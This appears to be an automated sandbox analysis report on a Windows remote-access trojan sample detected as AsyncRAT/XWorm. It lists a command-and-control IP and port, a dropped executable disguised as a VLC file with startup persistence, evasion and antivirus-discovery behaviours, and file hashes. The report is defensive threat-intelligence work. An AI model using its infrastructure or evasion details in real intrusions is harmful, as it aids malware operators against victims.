                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Lowering of HIPS / PFW / Operating System Security Settings

                            barindex
                            Yara detected AsyncRAT
                            Source: Yara matchFile source: 18fvs4AVae.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.18fvs4AVae.exe.480000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\VLC_Media.exe, type: DROPPED
                            Source: 18fvs4AVae.exe, 00000000.00000002.2977632965.000000001B524000.00000004.00000020.00020000.00000000.sdmp, 18fvs4AVae.exe, 00000000.00000002.2977632965.000000001B480000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected XWorm
                            Source: Yara matchFile source: 18fvs4AVae.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.18fvs4AVae.exe.480000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2946825942.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 18fvs4AVae.exe PID: 7396, type: MEMORYSTR
                            Source: Yara matchFile source: C:\ProgramData\VLC_Media.exe, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Yara detected XWorm
                            Source: Yara matchFile source: 18fvs4AVae.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.18fvs4AVae.exe.480000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2946825942.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 18fvs4AVae.exe PID: 7396, type: MEMORYSTR
                            Source: Yara matchFile source: C:\ProgramData\VLC_Media.exe, type: DROPPED

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                            Windows Management Instrumentation                            		1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		11
                            Disable or Modify Tools                            		1
                            Input Capture                            		1
                            File and Directory Discovery                            		Remote Services11
                            Archive Collected Data                            		1
                            Ingress Tool Transfer                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Scheduled Task/Job                            		1
                            Scheduled Task/Job                            		11
                            Process Injection                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory23
                            System Information Discovery                            		Remote Desktop Protocol1
                            Input Capture                            		1
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts1
                            PowerShell                            		2
                            Registry Run Keys / Startup Folder                            		1
                            Scheduled Task/Job                            		11
                            Obfuscated Files or Information                            		Security Account Manager541
                            Security Software Discovery                            		SMB/Windows Admin SharesData from Network Shared Drive1
                            Non-Standard Port                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                            Registry Run Keys / Startup Folder                            		2
                            Software Packing                            		NTDS1
                            Process Discovery                            		Distributed Component Object ModelInput Capture2
                            Non-Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            DLL Side-Loading                            		LSA Secrets151
                            Virtualization/Sandbox Evasion                            		SSHKeylogging12
                            Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            Masquerading                            		Cached Domain Credentials1
                            Application Window Discovery                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                            Virtualization/Sandbox Evasion                            		DCSync1
                            System Network Configuration Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                            Process Injection                            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561582 Sample: 18fvs4AVae.exe Startdate: 23/11/2024 Architecture: WINDOWS Score: 100 32 ip-api.com 2->32 38 Suricata IDS alerts for network traffic 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 18 other signatures 2->44 8 18fvs4AVae.exe 14 6 2->8         started        signatures3 process4 dnsIp5 34 45.141.26.170, 49738, 7000 SPECTRAIPSpectraIPBVNL Netherlands 8->34 36 ip-api.com 208.95.112.1, 49730, 80 TUT-ASUS United States 8->36 30 C:\ProgramData\VLC_Media.exe, PE32 8->30 dropped 46 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->46 48 Protects its processes via BreakOnTermination flag 8->48 50 Bypasses PowerShell execution policy 8->50 52 3 other signatures 8->52 13 powershell.exe 23 8->13         started        16 powershell.exe 23 8->16         started        18 powershell.exe 23 8->18         started        20 powershell.exe 8->20         started        file6 signatures7 process8 signatures9 54 Loading BitLocker PowerShell Module 13->54 22 conhost.exe 13->22         started        24 conhost.exe 16->24         started        26 conhost.exe 18->26         started        28 conhost.exe 20->28         started        process10

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            18fvs4AVae.exe79%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                            18fvs4AVae.exe100%AviraTR/Spy.Gen
                            18fvs4AVae.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\ProgramData\VLC_Media.exe100%AviraTR/Spy.Gen
                            C:\ProgramData\VLC_Media.exe100%Joe Sandbox ML
                            C:\ProgramData\VLC_Media.exe79%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            45.141.26.1700%Avira URL Cloudsafe
                            http://crl.microsg0%Avira URL Cloudsafe
                            http://crl.microsVa0%Avira URL Cloudsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            ip-api.com
                            		208.95.112.1
                            		truefalse
                              		high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              45.141.26.170true
                              • Avira URL Cloud: safe
                              		unknown
                              http://ip-api.com/line/?fields=hostingfalse
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://crl.microsgpowershell.exe, 00000001.00000002.1798296730.000002D1B8170000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1791703143.000002D1AFD84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1872550418.000001CE90235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2017198373.000001AD308E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2210782431.0000016B77BC3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2082830684.0000016B67D7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1768182208.000002D19FF39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1823361318.000001CE803E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934588558.000001AD20A99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2082830684.0000016B67D7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2082830684.0000016B67D7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1768182208.000002D19FF39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1823361318.000001CE803E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934588558.000001AD20A99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2082830684.0000016B67D7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/powershell.exe, 0000000B.00000002.2210782431.0000016B77BC3000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1791703143.000002D1AFD84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1872550418.000001CE90235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2017198373.000001AD308E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2210782431.0000016B77BC3000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2210782431.0000016B77BC3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://crl.micpowershell.exe, 00000001.00000002.1797852987.000002D1B8130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2210782431.0000016B77BC3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.microsoft.powershell.exe, 00000001.00000002.1798381263.000002D1B825B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://crl.micft.cMicRosofpowershell.exe, 00000001.00000002.1797852987.000002D1B8130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://aka.ms/pscore68powershell.exe, 00000001.00000002.1768182208.000002D19FD11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1823361318.000001CE801C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934588558.000001AD20871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2082830684.0000016B67B51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://crl.micrpowershell.exe, 00000009.00000002.2034818425.000001AD38F0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name18fvs4AVae.exe, 00000000.00000002.2946825942.0000000002771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1768182208.000002D19FD11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1823361318.000001CE801C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934588558.000001AD20871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2082830684.0000016B67B51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2082830684.0000016B67D7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://crl.microsVapowershell.exe, 00000009.00000002.2034616879.000001AD38DE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                208.95.112.1
                                                                		ip-api.comUnited States
                                                                		53334TUT-ASUSfalse
                                                                45.141.26.170
                                                                		unknownNetherlands
                                                                		62068SPECTRAIPSpectraIPBVNLtrue

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1561582
                                                                Start date and time:2024-11-23 20:54:05 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 6m 15s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:14
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:18fvs4AVae.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:9c113da0d913a9fd2a84c5c9a71da4338e3f16a62b8215ecb7a58d10ccab524f.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@13/20@1/2
                                                                EGA Information:
                                                                • Successful, ratio: 20%
                                                                HCA Information:
                                                                • Successful, ratio: 99%
                                                                • Number of executed functions: 48
                                                                • Number of non-executed functions: 5
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target powershell.exe, PID 4008 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 7524 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 7748 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 8088 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                • VT rate limit hit for: 18fvs4AVae.exe

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                14:55:03API Interceptor51x Sleep call for process: powershell.exe modified
                                                                14:55:55API Interceptor449385x Sleep call for process: 18fvs4AVae.exe modified
                                                                19:55:56AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VLC_Media.lnk

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                208.95.112.1cmd.exeGet hashmaliciousBlank GrabberBrowse
                                                                • ip-api.com/json/?fields=225545
                                                                z81zEuzkJPHHV3KYua.exeGet hashmaliciousAgentTeslaBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                • ip-api.com/json/
                                                                Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                • ip-api.com/json/
                                                                NeftPaymentError_details__Emdtd22102024_jpg.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                • ip-api.com/json/
                                                                Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                HnJdZm51Xl.exeGet hashmaliciousAmadey, Clipboard HijackerBrowse
                                                                • ip-api.com/line/
                                                                file.exeGet hashmaliciousJasonRATBrowse
                                                                • ip-api.com/json/?fields=11827
                                                                Fulloption_V2.1.exeGet hashmaliciousXWormBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                BoostFPS.exeGet hashmaliciousXWormBrowse
                                                                • ip-api.com/line/?fields=hosting

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                ip-api.comcmd.exeGet hashmaliciousBlank GrabberBrowse
                                                                • 208.95.112.1
                                                                z81zEuzkJPHHV3KYua.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 208.95.112.1
                                                                Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                • 208.95.112.1
                                                                Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                • 208.95.112.1
                                                                NeftPaymentError_details__Emdtd22102024_jpg.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                • 208.95.112.1
                                                                Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 208.95.112.1
                                                                http://christians-google-sh-97m2.glide.page/dl/d0a5f4Get hashmaliciousUnknownBrowse
                                                                • 208.95.112.2
                                                                HnJdZm51Xl.exeGet hashmaliciousAmadey, Clipboard HijackerBrowse
                                                                • 208.95.112.1
                                                                file.exeGet hashmaliciousJasonRATBrowse
                                                                • 208.95.112.1
                                                                Fulloption_V2.1.exeGet hashmaliciousXWormBrowse
                                                                • 208.95.112.1

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                TUT-ASUScmd.exeGet hashmaliciousBlank GrabberBrowse
                                                                • 208.95.112.1
                                                                z81zEuzkJPHHV3KYua.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 208.95.112.1
                                                                Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                • 208.95.112.1
                                                                Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                • 208.95.112.1
                                                                NeftPaymentError_details__Emdtd22102024_jpg.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                • 208.95.112.1
                                                                Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 208.95.112.1
                                                                http://christians-google-sh-97m2.glide.page/dl/d0a5f4Get hashmaliciousUnknownBrowse
                                                                • 208.95.112.2
                                                                HnJdZm51Xl.exeGet hashmaliciousAmadey, Clipboard HijackerBrowse
                                                                • 208.95.112.1
                                                                file.exeGet hashmaliciousJasonRATBrowse
                                                                • 208.95.112.1
                                                                Fulloption_V2.1.exeGet hashmaliciousXWormBrowse
                                                                • 208.95.112.1
                                                                SPECTRAIPSpectraIPBVNLFulloption_V2.1.exeGet hashmaliciousXWormBrowse
                                                                • 45.141.27.248
                                                                BoostFPS.exeGet hashmaliciousXWormBrowse
                                                                • 45.141.27.248
                                                                bPRQRIfbbq.exeGet hashmaliciousUnknownBrowse
                                                                • 45.138.16.44
                                                                4Fm0sK0yKz.exeGet hashmaliciousAsyncRATBrowse
                                                                • 45.141.215.18
                                                                Payload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
                                                                • 45.141.215.40
                                                                Payload 94.75 (2).225.exeGet hashmaliciousUnknownBrowse
                                                                • 45.141.215.116
                                                                Payload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
                                                                • 45.138.16.76
                                                                Payload 94.75 (2).225.exeGet hashmaliciousUnknownBrowse
                                                                • 45.141.215.21
                                                                Payload 94.75.225.exeGet hashmaliciousUnknownBrowse
                                                                • 45.141.215.61
                                                                https://alcatrazpackages.com/elchapo.htmlGet hashmaliciousUnknownBrowse
                                                                • 45.87.42.74

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\ProgramData\VLC_Media.exe

                                                                Download File
                                                                Process:C:\Users\user\Desktop\18fvs4AVae.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):51200
                                                                Entropy (8bit):5.451736682018347
                                                                Encrypted:false
                                                                SSDEEP:1536:Of05a/CTjS894Fc9UR68OMqddS1EAd8IIR:Of05a/CTJ94Fc9U3OM6gEA6IIR
                                                                MD5:59A9510540FEC35043B990DEB270B139
                                                                SHA1:54D66862A4C08EBCBA8029EC99D558725603F486
                                                                SHA-256:9C113DA0D913A9FD2A84C5C9A71DA4338E3F16A62B8215ECB7A58D10CCAB524F
                                                                SHA-512:011EA8FFE125A6F68F149A0A5B7BCD95197AC8B7D3D7D362807EF984E971411F2B125921FBCBC183E95633555AC58C4E287B6A858F19E077DD9A8EB0975E3E06
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\ProgramData\VLC_Media.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\VLC_Media.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\VLC_Media.exe, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\VLC_Media.exe, Author: ditekSHen
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 79%
                                                                Reputation:low
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%8g................................. ........@.. ....................... ............@.................................T...W........+........................................................................... ............... ..H............text........ ...................... ..`.rsrc....+.......,..................@..@.reloc..............................@..B........................H.......|]...Y............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):64
                                                                Entropy (8bit):0.34726597513537405
                                                                Encrypted:false
                                                                SSDEEP:3:Nlll:Nll
                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
